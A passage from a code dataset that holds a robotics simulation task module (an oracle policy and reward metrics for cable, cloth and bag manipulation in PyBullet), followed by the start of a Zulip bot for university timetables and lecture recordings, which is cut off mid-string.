elif direction == 3:\n source = corner_idx_np[3]\n target = corner_idx_np[1]\n vertex_pos = vertpos_xy_np[source]\n target_pos = vertpos_xy_np[target]\n overshoot = 0.03\n\n # We adjusted overshooting earlier based on the task stage.\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif isinstance(self, tasks.names['bag-alone-open']):\n # ------------------------------------------------------------ #\n # Have a circular ring of targets on the 2D plane, and want to\n # maximize bag opening area. Due to rotations, we consider 32\n # different bead to target 'assignments'. Pick the one that is\n # closest w.r.t. the xy plane. THEN find the single bag top\n # ring vertex and corner target that's furthest. Unlike\n # cable-ring, this does NOT consider 'flipped beads' in the\n # rotation, due to the way the bag is sampled.\n # ------------------------------------------------------------ #\n visible_beads = []\n for bead in self.cable_bead_ids:\n if bead in object_mask:\n visible_beads.append(bead)\n frac_visible = len(visible_beads) / len(self.cable_bead_ids)\n\n # If only a few beads are visible, exit early.\n if frac_visible <= BEAD_THRESH:\n self.exit_gracefully = True\n print(f'WARNING: fraction of visible beads: {frac_visible}')\n act['params'] = IDENTITY\n act['primitive'] = self.primitive\n return act\n\n # Get vertex information of beads, then targets for those.\n vert_pos_l = []\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n vert_pos_l.append(bead_position)\n vertpos_xyz_np = np.array(vert_pos_l)\n targets_l = self.circle_target_positions\n targets_xyz_np = np.array([[p[0], p[1], p[2]] for p in targets_l])\n\n assert vertpos_xyz_np.shape == targets_xyz_np.shape\n assert len(self.top_ring_idxs) == len(self.cable_bead_ids)\n nb_maps = len(self.top_ring_idxs)\n min_dist = np.float('inf')\n vertex_pos, target_pos = None, None\n\n for a in range(nb_maps):\n # mapping = [a, a+1, ..., nb_maps-1, 0, 1, ..., a-1]\n mapping = list(range(a, nb_maps)) + list(range(0, a))\n differences = targets_xyz_np - vertpos_xyz_np[mapping]\n distances = np.linalg.norm(differences, axis=1)\n average_distance = np.mean(distances)\n\n if average_distance < min_dist:\n # Index of the largest distance among vertex + target.\n max_idx = np.argmax(distances)\n vertex_pos = vertpos_xyz_np[mapping][max_idx]\n target_pos = targets_xyz_np[max_idx]\n min_dist = average_distance\n\n # Make the robot 'overshoot' slightly towards the target position.\n overshoot = 0.02\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif (isinstance(self, tasks.names['bag-items-easy']) or\n isinstance(self, tasks.names['bag-items-hard'])):\n # ------------------------------------------------------------ #\n # Hard-coding the task stage selection in the subclasses, so\n # that the oracle and learned policies can use the code.\n # ------------------------------------------------------------ #\n # (1) Same as bag-alone-open to open up the bag.\n # (2) Insert items into the bag. Refer to `self.item_ids` for\n # items to insert. Use the segmentation mask for placing.\n # (3) Move the bag with the item(s).\n # ------------------------------------------------------------ #\n visible_beads = []\n for bead in self.cable_bead_ids:\n if bead in object_mask:\n visible_beads.append(bead)\n\n # Allocate the stage selection to the task-specific method.\n success, place_pixels_eroded = self.determine_task_stage(\n colormap=colormap,\n heightmap=heightmap,\n object_mask=object_mask,\n visible_beads=visible_beads)\n\n # Exit gracefully.\n if not success:\n self.exit_gracefully = True\n act['params'] = IDENTITY\n act['primitive'] = self.primitive\n return act\n\n if self.task_stage == 1:\n # Copy bag-alone-open.\n vert_pos_l = []\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n vert_pos_l.append(bead_position)\n vertpos_xyz_np = np.array(vert_pos_l)\n\n targets_l = self.circle_target_positions\n targets_xyz_np = np.array([[p[0], p[1], p[2]] for p in targets_l])\n\n assert vertpos_xyz_np.shape == targets_xyz_np.shape\n assert len(self.top_ring_idxs) == len(self.cable_bead_ids)\n nb_maps = len(self.top_ring_idxs)\n min_dist = np.float('inf')\n vertex_pos, target_pos = None, None\n\n for a in range(nb_maps):\n # mapping = [a, a+1, ..., nb_maps-1, 0, 1, ..., a-1]\n mapping = list(range(a, nb_maps)) + list(range(0, a))\n differences = targets_xyz_np - vertpos_xyz_np[mapping]\n distances = np.linalg.norm(differences, axis=1)\n average_distance = np.mean(distances)\n\n if average_distance < min_dist:\n # Index of the largest distance among vertex + target.\n max_idx = np.argmax(distances)\n vertex_pos = vertpos_xyz_np[mapping][max_idx]\n target_pos = targets_xyz_np[max_idx]\n min_dist = average_distance\n\n # Make the robot 'overshoot' slightly towards the target position.\n overshoot = 0.02\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif self.task_stage == 2:\n # Identify an item that is not within the bag.\n item = None\n for id_ in self.item_ids:\n if id_ not in self.items_in_bag_ids:\n item = id_\n pick_mask = np.uint8(object_mask == item)\n pick_mask = cv2.erode(pick_mask, np.ones((3, 3), np.uint8))\n assert np.sum(pick_mask) > 0\n break\n assert item is not None\n\n # Key assumption: we assume the placing will be successful.\n self.items_in_bag_ids.append(item)\n\n # Compute picking point. Sample anywhere on item's eroded area.\n pick_prob = np.float32(pick_mask)\n pick_pixel = utils.sample_distribution(pick_prob)\n pick_position = utils.pixel_to_position(pick_pixel, heightmap,\n self.bounds, self.pixel_size)\n p0 = pick_position\n\n # Placing position. Sample anywhere on the open eroded area.\n place_prob = np.float32(place_pixels_eroded)\n place_pixel = utils.sample_distribution(place_prob)\n place_position = utils.pixel_to_position(place_pixel, heightmap,\n self.bounds, self.pixel_size)\n p1 = place_position\n\n # Get the usual action parameter, without overshooting.\n act['params'] = self.params_no_rots(p0, p1, overshoot=0.0)\n\n if isinstance(self, tasks.names['bag-items-hard']):\n new_pose1 = act['params']['pose1']\n\n # But now sample the rotation, assuming we use 24 (TODO: make more\n # robust?).\n num_rots = 24\n rots = [i * 2 * np.pi / num_rots for i in range(num_rots)]\n rot = np.random.choice(rots)\n # rot_deg = rot * 180 / np.pi\n\n # Assign placing pose. Picking still uses identity rotation.\n new_rot1 = p.getQuaternionFromEuler((0, 0, rot))\n new_pose1 = (new_pose1[0], new_rot1)\n act['params']['pose1'] = new_pose1\n\n elif self.task_stage == 3:\n # Bag gripping + depositing. Currently considering any VISIBLE bead as\n # pick points at random. If we filter data, hopefully a pattern\n # appears.\n p0 = None\n p1 = self.zone_pose[0]\n\n if not visible_beads:\n print('WARNING: no visible beads in task stage 3??')\n visible_beads.append(self.cable_bead_ids[0])\n\n bead_id = np.random.choice(visible_beads)\n p0 = p.getBasePositionAndOrientation(bead_id)[0]\n act['params'] = self.params_no_rots(p0, p1, overshoot=0.0)\n\n elif (self.primitive == 'pick_place' or\n self.primitive == 'pick_place_6dof'):\n\n # Trigger reset if no ground truth steps are available.\n if not self.goal['steps']:\n self.goal['steps'] = [] # trigger done then reset\n return act\n\n # Get possible picking locations (prioritize furthest).\n next_step = self.goal['steps'][0]\n possible_objects = np.int32(list(next_step.keys())).copy()\n distances = []\n for object_id in possible_objects:\n position = p.getBasePositionAndOrientation(object_id)[0]\n targets = next_step[object_id][1]\n targets = [t for t in targets if t in self.goal['places']]\n places = [self.goal['places'][t][0] for t in targets]\n d = np.float32(places) - np.float32(position).reshape(1, 3)\n distances.append(np.min(np.linalg.norm(d, axis=1)))\n distances_sort = np.argsort(distances)[::-1]\n possible_objects = possible_objects[distances_sort]\n for object_id in possible_objects:\n pick_mask = np.uint8(object_mask == object_id)\n pick_mask = cv2.erode(pick_mask, np.ones((3, 3), np.uint8))\n if np.sum(pick_mask) > 0:\n break\n\n # Trigger task reset if no object is visible.\n if np.sum(pick_mask) == 0:\n self.goal['steps'] = [] # trigger done then reset\n return act\n\n # Compute picking pose.\n pick_prob = np.float32(pick_mask)\n pick_pixel = utils.sample_distribution(pick_prob)\n # For \"deterministic\" demonstrations on insertion-easy, use this:\n # pick_pixel = (160,80)\n pick_position = utils.pixel_to_position(pick_pixel, heightmap,\n self.bounds, self.pixel_size)\n pick_rotation = utils.get_pybullet_quaternion_from_rot((0, 0, 0))\n pick_pose = (pick_position, pick_rotation)\n\n # Get candidate target placing poses.\n targets = next_step[object_id][1]\n targets = [pi for pi in targets if pi in self.goal['places']]\n i = np.random.randint(0, len(targets))\n true_pose = self.goal['places'][targets[i]]\n\n # Compute placing pose.\n object_pose = p.getBasePositionAndOrientation(object_id)\n world_to_pick = utils.invert(pick_pose)\n object_to_pick = utils.multiply(world_to_pick, object_pose)\n pick_to_object = utils.invert(object_to_pick)\n place_pose = utils.multiply(true_pose, pick_to_object)\n\n # For various cable-envs, we don't want to apply rotations.\n if (isinstance(self, tasks.names['cable']) or\n isinstance(self, tasks.names['cable-shape']) or\n isinstance(self, tasks.names['cable-shape-notarget']) or\n isinstance(self, tasks.names['cable-line-notarget'])):\n place_pose = (place_pose[0], (0, 0, 0, 1))\n\n params = {'pose0': pick_pose, 'pose1': place_pose}\n act['params'] = params\n\n elif isinstance(self, tasks.names['sweeping']):\n p0 = None\n p1 = self.zone_pose[0]\n\n # Set farthest object position as start position.\n for object_id in self.object_points:\n object_pose = p.getBasePositionAndOrientation(object_id)\n position = self.object_points[object_id].squeeze()\n position = utils.apply(object_pose, position)\n d = np.linalg.norm(np.float32(position) - np.float32(p1))\n if (p0 is None) or (d > threshold):\n p0 = position\n threshold = d\n\n # Adjust start and end positions.\n p0 = (p0[0], p0[1], 0.001)\n p1 = (p1[0], p1[1], 0.001)\n rotation = utils.get_pybullet_quaternion_from_rot((0, 0, 0))\n direction = np.float32(p0) - np.float32(p1)\n length = np.linalg.norm(direction)\n direction = direction / length\n new_p0 = np.float32(p1) + direction * (length + 0.02)\n new_p1 = np.float32(p0) - direction * (length - 0.05)\n p0, p1 = tuple(new_p0), tuple(new_p1)\n\n params = {'pose0': (p0, rotation), 'pose1': (p1, rotation)}\n act['params'] = params\n\n elif isinstance(self, tasks.names['pushing']):\n\n # Get start position.\n p0 = np.float32(p.getLinkState(env.ur5, env.ee_tip_link)[0])\n rotation = utils.get_pybullet_quaternion_from_rot((0, 0, 0))\n\n # Compute end position.\n goal_position = np.array([0.5, -0.5, 0])\n object_id = env.objects[0]\n object_pose = p.getBasePositionAndOrientation(object_id)\n world_to_object = utils.invert(object_pose)\n goal_position = utils.apply(world_to_object, goal_position)\n p1_object = np.float32(goal_position)\n p1_object[0] = -p1_object[0] * 2\n p1 = utils.apply(object_pose, p1_object)\n\n push_direction = (p1 - p0) / np.linalg.norm((p1 - p0))\n p1 = p0 + push_direction * 0.01\n\n params = {'pose0': (p0, rotation), 'pose1': (p1, rotation)}\n act['params'] = params\n else:\n raise ValueError(f'Task {self} is not supported! {tasks.names}')\n\n act['primitive'] = self.primitive\n return act\n\n return OracleAgent(act)\n\n def params_no_rots(self, vertex_pos, target_pos, overshoot):\n \"\"\"Helper to handle common pick-place code for the oracle policy.\n\n We often have this patten: vertex positions and target positions in\n 2D, and then potentially slightly overshoot the target. For example,\n with cloth it's helpful to do this since otherwise the physics will\n favor the cloth 'resetting' to its original state. Get the direction\n by creating vectors and then add to the new target. Then form tuples\n for the action params. Assumes no new rotations.\n\n Args:\n vertex_pos: 2D tuple or array representing picking position.\n target_pos: 2D tuple or array representing target position.\n overshoot: how much to go beyond the target position.\n\n Returns:\n Dict for the action with 'pose0' and 'pose1' keys.\n \"\"\"\n p0 = (vertex_pos[0], vertex_pos[1], 0.001)\n p1 = (target_pos[0], target_pos[1], 0.001)\n direction = np.float32(p0) - np.float32(p1)\n length = np.linalg.norm(direction)\n direction = direction / length\n new_p0 = np.float32(p1) + direction * (length - 0.00)\n new_p1 = np.float32(p0) - direction * (length + overshoot)\n p0, p1 = tuple(new_p0), tuple(new_p1)\n params = {'pose0': (p0, (0, 0, 0, 1)), 'pose1': (p1, (0, 0, 0, 1))}\n return params\n\n #-------------------------------------------------------------------------\n # Reward Function and Task Completion Metrics\n #-------------------------------------------------------------------------\n\n def reward(self):\n \"\"\"Compute the (delta) reward for current timestep.\n\n Returns:\n A tuple consisting of the scalar (delta) reward, plus `extras`\n dict which has extra task-dependent info from the process of\n computing rewards that gives us finer-grained details. Use\n `extras` for further data analysis.\n \"\"\"\n reward = 0\n extras = {}\n if self.done():\n return reward, extras\n\n # Pose-based evaluation metric.\n if self.metric == 'pose':\n curr_step = self.goal['steps'][0] # pass-by-reference\n\n for object_id in list(curr_step.keys()):\n curr_pose = p.getBasePositionAndOrientation(object_id)\n\n # Get all possible placement poses.\n places_positions = np.zeros((0, 3))\n places_rotations = np.zeros((0, 3))\n symmetry, places = curr_step[object_id]\n places = [t for t in places if t in self.goal['places']]\n for place in places:\n pose = self.goal['places'][place]\n places_positions = np.vstack((places_positions, pose[0]))\n rotation = utils.get_rot_from_pybullet_quaternion(pose[1])\n places_rotations = np.vstack((places_rotations, rotation))\n\n # Compute translational error.\n curr_position = np.array(curr_pose[0])[:2].reshape(1, 2)\n error_t = places_positions[:, :2] - curr_position\n error_t = np.linalg.norm(error_t, axis=1)\n\n # Compute rotational error.\n error_r = 0\n if symmetry > 0:\n curr_rotation = utils.get_rot_from_pybullet_quaternion(\n curr_pose[1])[2]\n error_r = places_rotations[:, 2] - curr_rotation\n error_r = abs(error_r) % symmetry\n neg_ind = error_r > (symmetry / 2)\n error_r[neg_ind] = symmetry - error_r[neg_ind]\n\n # Compute reward from error.\n success_t = error_t < self.position_eps\n success_r = error_r < self.rotation_eps\n success = success_t & success_r\n if any(success):\n reward += 1. / self.num_steps\n\n # Remove from possible placement poses.\n place = places[np.argwhere(success).squeeze()]\n self.goal['places'].pop(place)\n curr_step.pop(object_id)\n\n # Next step?\n if not curr_step:\n self.goal['steps'].pop(0)\n\n # Zone-based evaluation metric.\n elif self.metric == 'zone':\n total_rewards = 0\n zone_points = []\n for object_id in self.object_points:\n points = self.object_points[object_id]\n object_pose = p.getBasePositionAndOrientation(object_id)\n world_to_zone = utils.invert(self.zone_pose)\n object_to_zone = utils.multiply(world_to_zone, object_pose)\n points = np.float32(utils.apply(object_to_zone, points))\n valid_points = np.logical_and.reduce([\n points[0, :] > -self.zone_size[0] / 2,\n points[0, :] < self.zone_size[0] / 2,\n points[1, :] > -self.zone_size[1] / 2,\n points[1, :] < self.zone_size[1] / 2, points[2, :] > -0.01,\n points[2, :] < self.bounds[2, 1]\n ]).tolist()\n if hasattr(self, 'goal'):\n if not isinstance(self, tasks.names['cable']):\n if len(self.goal['steps']) and any(valid_points):\n if object_id == list(self.goal['steps'][0].keys())[0]:\n self.goal['steps'].pop(0)\n zone_points += valid_points\n total_rewards = np.sum(np.array(zone_points)) / len(zone_points)\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n # Palletizing: spawn another box in the workspace if it is empty.\n if isinstance(self, tasks.names['palletizing']):\n if self.goal['steps']:\n workspace_empty = True\n for object_id in self.object_points:\n object_pose = p.getBasePositionAndOrientation(object_id)\n workspace_empty = workspace_empty and ((object_pose[0][1] < -0.5) or\n (object_pose[0][1] > 0))\n if workspace_empty:\n object_id = list(self.goal['steps'][0].keys())[0]\n theta = np.random.random() * 2 * np.pi\n rotation = utils.get_pybullet_quaternion_from_rot((0, 0, theta))\n p.resetBasePositionAndOrientation(object_id, [0.5, -0.25, 0.1],\n rotation)\n\n elif self.metric == 'cable-target':\n # ---------------------------------------------------------------- #\n # When a cable has to match a target, but where the target is not\n # necessarily a straight line; for a straight line, we could use\n # `zone_size` but here it's easier to iterate through all possible\n # targets. ONLY consider those IDs in `cable_bead_ids`. We don't\n # need the machinery with poses because `object_points` should be\n # zero for the beads. We only check if the bead is close to ANY\n # target. This resolves ambiguity if the cable is reversed, or with\n # a ring of cables. Depends on a `dist_thresh` radius.\n # ---------------------------------------------------------------- #\n dist_threshold = self.radius * 3.5 # 2*radius is too strict.\n zone_points = 0\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n min_d = np.float('inf')\n for key in self.goal['places']:\n target_position = self.goal['places'][key][0]\n bead_xy = np.array([bead_position[0], bead_position[1]])\n target_xy = np.array([target_position[0], target_position[1]])\n dist = np.linalg.norm(bead_xy - target_xy)\n if dist < min_d:\n min_d = dist\n if min_d < dist_threshold:\n zone_points += 1\n\n total_rewards = zone_points / len(self.cable_bead_ids)\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n # Helps us see if performance varies based on the target property.\n extras['nb_sides'] = self.nb_sides\n extras['nb_beads'] = len(self.cable_bead_ids)\n extras['nb_zone'] = zone_points\n extras['delta_reward'] = reward\n extras['total_rewards'] = total_rewards\n\n elif self.metric == 'cable-ring':\n # ---------------------------------------------------------------- #\n # Measure the convex hull of the area enclosed by the beads in\n # `self.cable_bead_ids`, Ignore delta rewards because those are\n # deltas of convex hulls and not easily interpretable. Just look at\n # `self.total_rewards` at any time and see if it clears a fraction.\n # ---------------------------------------------------------------- #\n points = []\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n points.append([bead_position[0], bead_position[1]])\n points = np.array([[p[0], p[1]] for p in points])\n\n # In 2D, this returns AREA (hull.area returns perimeter).\n try:\n hull = ConvexHull(points)\n convex_hull_area = hull.volume\n except scipy.spatial.qhull.QhullError as e:\n print(e)\n convex_hull_area = 0\n total_rewards = convex_hull_area\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n # `total_rewards` is redundant here but keep for consistency\n extras['convex_hull_area'] = convex_hull_area\n extras['best_possible_area'] = self.circle_area\n extras['fraction'] = convex_hull_area / self.circle_area\n extras['delta_reward'] = reward\n extras['total_rewards'] = total_rewards\n\n elif self.metric == 'cloth-coverage':\n # ---------------------------------------------------------------- #\n # Since we have an arbitrary target zone, using the convex hull (as\n # in our IROS 2020 paper) is insufficient because we might have\n # flattened the cloth in the wrong area. Use pixel-based coverage.\n # ---------------------------------------------------------------- #\n iou, coverage = self.compute_pixel_IoU_coverage()\n\n # The usual delta-based metrics. Using coverage now, but it could be IoU.\n total_rewards = coverage\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n extras['cloth_IoU'] = iou\n extras['cloth_coverage'] = coverage\n extras['reward'] = reward\n extras['total_rewards'] = total_rewards\n\n elif self.metric == 'cloth-cover-item':\n # ---------------------------------------------------------------- #\n # Cover an item with cloth. Current solution: get object mask and\n # see if the item is there. Additional sanity check: that the item\n # is actually within some distance from the cloth, otherwise it\n # could have fallen outside the workspace.\n # ---------------------------------------------------------------- #\n _, vert_pos_l = p.getMeshData(bodyUniqueId=self.cloth_id)\n corner_idx_np = np.array(self.corner_indices)\n vertpos_xy_np = np.array(vert_pos_l)[:, :2]\n cloth_center_xy = np.mean(vertpos_xy_np[corner_idx_np], axis=0)\n\n # Is the cube close to the center of the cloth by a threshold?\n assert len(self.block_ids) == 1, self.block_ids\n block_id = self.block_ids[0]\n block = p.getBasePositionAndOrientation(block_id)[0]\n dist_block2cent = np.linalg.norm(block[:2] - cloth_center_xy)\n\n # Get segmentation condtion with the distance condition.\n is_item_covered = self.is_item_covered()\n if dist_block2cent > 0.25:\n total_rewards = 0\n else:\n total_rewards = is_item_covered\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n extras['dist_block2cent'] = dist_block2cent\n extras['is_item_covered'] = is_item_covered\n extras['total_rewards'] = self.total_rewards\n\n elif self.metric == 'bag-alone-open':\n # ---------------------------------------------------------------- #\n # Measure area of the 'bag opening' visible. Given that we're doing\n # top-down pick and place (instead of 6 DoF) then it probably makes\n # sense (for now) just to measure the 2D projection of the top ring\n # vertices to the plane, and get the area from that? TODO(daniel):\n # include a test for vertex visibility?\n # ---------------------------------------------------------------- #\n points = []\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n points.append([bead_position[0], bead_position[1]])\n points = np.array([[p[0], p[1]] for p in points])\n\n # In 2D, this returns AREA (hull.area returns perimeter).\n try:\n hull = ConvexHull(points)\n convex_hull_area = hull.volume\n except scipy.spatial.qhull.QhullError as e:\n print(e)\n convex_hull_area = 0\n total_rewards = convex_hull_area\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n # `total_rewards` is redundant here but keep for consistency\n extras['convex_hull_area'] = convex_hull_area\n extras['best_possible_area'] = self.circle_area\n extras['fraction'] = convex_hull_area / self.circle_area\n extras['delta_reward'] = reward\n extras['total_rewards'] = self.total_rewards\n\n elif self.metric == 'bag-items':\n # ---------------------------------------------------------------- #\n # Ignore rewards in the first two task stages because items might\n # start in the zone already, or the bag might already be open. For\n # stage 3, reward is the percentage of bag beads in the zone, AND if\n # the cube is in the zone.\n # ---------------------------------------------------------------- #\n total_rewards = 0\n\n def points_in_zone(object_id):\n # For beads / small cubes, this is a binary test: 'is it in zone?'\n # Bigger blocks should have multiple points per object.\n points = self.object_points[object_id]\n object_pose = p.getBasePositionAndOrientation(object_id)\n world_to_zone = utils.invert(self.zone_pose)\n object_to_zone = utils.multiply(world_to_zone, object_pose)\n points = np.float32(utils.apply(object_to_zone, points))\n valid_points = np.logical_and.reduce([\n points[0, :] > -self.zone_size[0] / 2,\n points[0, :] < self.zone_size[0] / 2,\n points[1, :] > -self.zone_size[1] / 2,\n points[1, :] < self.zone_size[1] / 2, points[2, :] > -0.01,\n points[2, :] < self.bounds[2, 1]\n ]).tolist()\n return valid_points\n\n zone_items_rew = 0\n zone_beads_rew = 0\n\n if self.task_stage == 3:\n # 50% weight: items we actually want to be in the zone.\n zone_items = []\n for object_id in self.item_ids:\n valid_points = points_in_zone(object_id)\n zone_items += valid_points\n zone_items_rew = np.sum(np.array(zone_items)) / len(zone_items)\n zone_items_rew *= 0.5\n\n # 50% weight: the cable beads.\n zone_beads = []\n for bead_id in self.cable_bead_ids:\n valid_points = points_in_zone(bead_id)\n zone_beads += valid_points\n zone_beads_rew = np.sum(np.array(zone_beads)) / len(zone_beads)\n zone_beads_rew *= 0.5\n\n # Get total_rewards, then the usual delta and self.total_rewards.\n total_rewards = zone_items_rew + zone_beads_rew\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n # Other information to track -- convex hull.\n _, vert_pos_l = p.getMeshData(bodyUniqueId=self.bag_id)\n points = [vert_pos_l[i] for i in self.top_ring_idxs]\n points = np.array([[p[0], p[1]] for p in points])\n try:\n hull = ConvexHull(points)\n convex_hull_area = hull.volume\n except scipy.spatial.qhull.QhullError as e:\n print(e)\n convex_hull_area = 0\n\n # Track the `self.task_stage`, particularly important for these envs.\n extras['convex_hull_area'] = convex_hull_area\n extras['best_possible_area'] = self.circle_area\n extras['reward'] = reward\n extras['total_rewards'] = self.total_rewards\n extras['task_stage'] = self.task_stage\n extras['zone_items_rew'] = zone_items_rew\n extras['zone_beads_rew'] = zone_beads_rew\n\n else:\n raise NotImplementedError(self.metric)\n\n return reward, extras\n\n def done(self):\n \"\"\"Check if the task is done AND has not failed.\n\n Returns:\n True if the episode should be considered a success, which we\n use for measuring successes, which is particularly helpful for tasks\n where one may get successes on the very last time step, e.g., getting\n the cloth coverage threshold on the last alllowed action.\n However, for bag-items-easy and bag-items-hard (which use the\n 'bag-items' metric), it may be necessary to filter out demos that did\n not attain sufficiently high reward in external code. Currently, this\n is done in `main.py` and its ignore_this_demo() method.\n \"\"\"\n zone_done, defs_done, goal_done = False, False, False\n\n if self.metric == 'zone':\n zone_done = self.total_rewards == 1\n elif self.metric == 'cable-target':\n zone_done = self.total_rewards == 1\n elif self.metric == 'cable-ring':\n defs_done = (self.total_rewards / self.circle_area) >= self.area_thresh\n elif self.metric == 'cloth-coverage':\n defs_done = self.total_rewards >= self.coverage_threshold\n elif self.metric == 'cloth-cover-item':\n defs_done = self.total_rewards == 1\n elif self.metric == 'bag-alone-open':\n defs_done = (self.total_rewards / self.circle_area) >= self.area_thresh\n elif self.metric == 'bag-items':\n defs_done = self.total_rewards > 0\n\n # For tasks with self.metric == 'pose'.\n if hasattr(self, 'goal'):\n goal_done = len(self.goal['steps']) == 0 # pylint: disable=g-explicit-length-test\n return zone_done or defs_done or goal_done\n\n #-------------------------------------------------------------------------\n # Environment Helper Functions\n #-------------------------------------------------------------------------\n\n def fill_template(self, template, replace):\n \"\"\"Read template file and replace string keys.\"\"\"\n filepath = os.path.dirname(os.path.abspath(__file__))\n template = os.path.join(filepath, '..', template)\n with open(template, 'r') as file:\n fdata = file.read()\n for field in replace:\n for i in range(len(replace[field])):\n fdata = fdata.replace(f'{field}{i}', str(replace[field][i]))\n alphabet = string.ascii_lowercase + string.digits\n rname = ''.join(random.choices(alphabet, k=16))\n fname = f'{template}.{rname}'\n with open(fname, 'w') as file:\n file.write(fdata)\n return fname\n\n def random_size(self, min_x, max_x, min_y, max_y, min_z, max_z):\n \"\"\"Get random box size.\"\"\"\n size = np.random.rand(3)\n size[0] = size[0] * (max_x - min_x) + min_x\n size[1] = size[1] * (max_y - min_y) + min_y\n size[2] = size[2] * (max_z - min_z) + min_z\n return tuple(size)\n\n def get_object_masks(self, env):\n \"\"\"Get RGB-D orthographic heightmaps and segmentation masks.\"\"\"\n # TODO(andyzeng): speed this up with direct orthographic projection.\n\n # Capture RGB-D images and segmentation masks.\n color, depth = [], []\n for config in self.camera_config:\n color_t, depth_t, segm_t = env.render(config)\n color_t = np.concatenate((color_t, segm_t[Ellipsis, None]), axis=2)\n color.append(color_t)\n depth.append(depth_t)\n\n # Reconstruct orthographic heightmaps with segmentation masks.\n heightmaps, colormaps = utils.reconstruct_heightmaps(\n color, depth, self.camera_config, self.bounds, self.pixel_size)\n masks = [colormap[Ellipsis, 3:].squeeze() for colormap in colormaps]\n colormaps = np.array(colormaps)[Ellipsis, :3]\n heightmaps = np.array(heightmaps)\n object_masks = np.array(masks)\n\n # Fuse heightmaps from different views.\n valid = np.sum(colormaps, axis=3) > 0\n repeat = np.sum(valid, axis=0)\n repeat[repeat == 0] = 1\n colormap = np.sum(colormaps, axis=0) / repeat[Ellipsis, None]\n colormap = np.uint8(np.round(colormap))\n heightmap = np.max(heightmaps, axis=0)\n # object_mask = np.sum(object_masks, axis=0) / repeat\n object_mask = np.max(object_masks, axis=0)\n\n return colormap, heightmap, object_mask\n\n def random_pose(self, env, object_size):\n \"\"\"Get random collision-free pose in workspace bounds for object.\"\"\"\n plane_id = 1\n max_size = np.sqrt(object_size[0]**2 + object_size[1]**2)\n erode_size = int(np.round(max_size / self.pixel_size))\n _, heightmap, object_mask = self.get_object_masks(env)\n\n # Sample freespace regions in workspace.\n mask = np.uint8(object_mask == plane_id)\n mask[0, :], mask[:, 0], mask[-1, :], mask[:, -1] = 0, 0, 0, 0\n mask = cv2.erode(mask, np.ones((erode_size, erode_size), np.uint8))\n if np.sum(mask) == 0:\n return\n pixel = utils.sample_distribution(np.float32(mask))\n position = utils.pixel_to_position(pixel, heightmap, self.bounds,\n self.pixel_size)\n position = (position[0], position[1], object_size[2] / 2)\n rtheta = np.random.rand() * 2 * np.pi\n rotation = utils.get_pybullet_quaternion_from_rot((0, 0, rtheta))\n return position, rotation\n\n def get_object_points(self, object_id):\n object_shape = p.getVisualShapeData(object_id)\n object_dim = object_shape[0][3]\n xv, yv, zv = np.meshgrid(\n np.arange(-object_dim[0] / 2, object_dim[0] / 2, 0.02),\n np.arange(-object_dim[1] / 2, object_dim[1] / 2, 0.02),\n np.arange(-object_dim[2] / 2, object_dim[2] / 2, 0.02),\n sparse=False,\n indexing='xy')\n return np.vstack((xv.reshape(1, -1), yv.reshape(1, -1), zv.reshape(1, -1)))\n\n def color_random_brown(self, object_id):\n shade = np.random.rand() + 0.5\n color = np.float32([shade * 156, shade * 117, shade * 95, 255]) / 255\n p.changeVisualShape(object_id, -1, rgbaColor=color)\n","sub_path":"ravens/ravens/tasks/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":44108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"174365814","text":"import sys\nsys.path.insert(1, 'venv/Lib/site-packages')\nimport zulip\nimport timetable\nimport record\n\n\nBOT_MAIL = \"hse-bot@chat.miem.hse.ru\"\nHSE_API = \"https://www.hse.ru/api/timetable/lessons?\"\n\nHELLO_MESSAGE = '''\nДоброго времени суток!\n\nЯ, Service Bot, cоздан для интеграции Зулипа с некоторыми сервисами МИЭМа\n\nС моей помощью вы можете: \n1) Узнать расписание для себя или другого человека\nЧтобы уточнить список команд для работы с расписанием, отправьте мне сообщение с ключевой фразой \"Помощь расписание\"\n\n2) Отправить запрос на запись занятия\nЧтобы уточнить список команд для работы с расписанием, отправьте мне сообщение с ключевой фразой \"Помощь запись\"\n\n'''\nHELP_RUZ_MESSAGE = '''\nЯ, Service Bot, могу помочь узнавать расписание прямо в диалоге со мной или в стриме, упомянув меня в сообщении \n(через @) :)\n\nСамый быстрый способ - написать мне сообщение с одним только ключевым словом \"Расписание\".\n\nПример: \"Покажи мне расписание\" или просто \"расписание\"\n\nТакой способ показывает положение дел на текущую неделю.\nЕсли нужно конкретнее указать, на какой день или на какой период расписание необходимо, есть несколько способов:\n\n\"Расписание на сегодня\"\n\"Расписание на завтра\"\n\"Расписание на dd.MM.yyyy\" - на день, соответствующий какой-то дате\n\"Расписание на dd.MM.yyyy-dd.MM.yyyy\" - на период\n\"Расписание на среду\" - на какой-то день недели (день недели в винительном падеже :))\n\nТакже, есть возможность узнать расписание приятеля или преподавателя. \nНужно всего лишь знать его корпоративную почту и добавить в конец сообщения фразу \"для xxx@edu.hse.ru\".\n\nПример: \"расписание на завтра для msmeladze@hse.ru\"\n\n'''\n\nHELP_NVR_MESSAGE = '''\nЯ, Service Bot, могу помочь получить запись лекции прямо в диалоге со мной или в стриме, упомянув меня в сообщении \n(через @) :)\n\nЧтобы получить список доступных аудиторий, введите команду \"Список аудиторий\"\n\nЧтобы запросить видеозапись занятия, отправьте сообщение с номером аудитории, датой, временем начала и окончания записи, \nа также названием будущей видеозаписи в таком формате: \"запись room_name 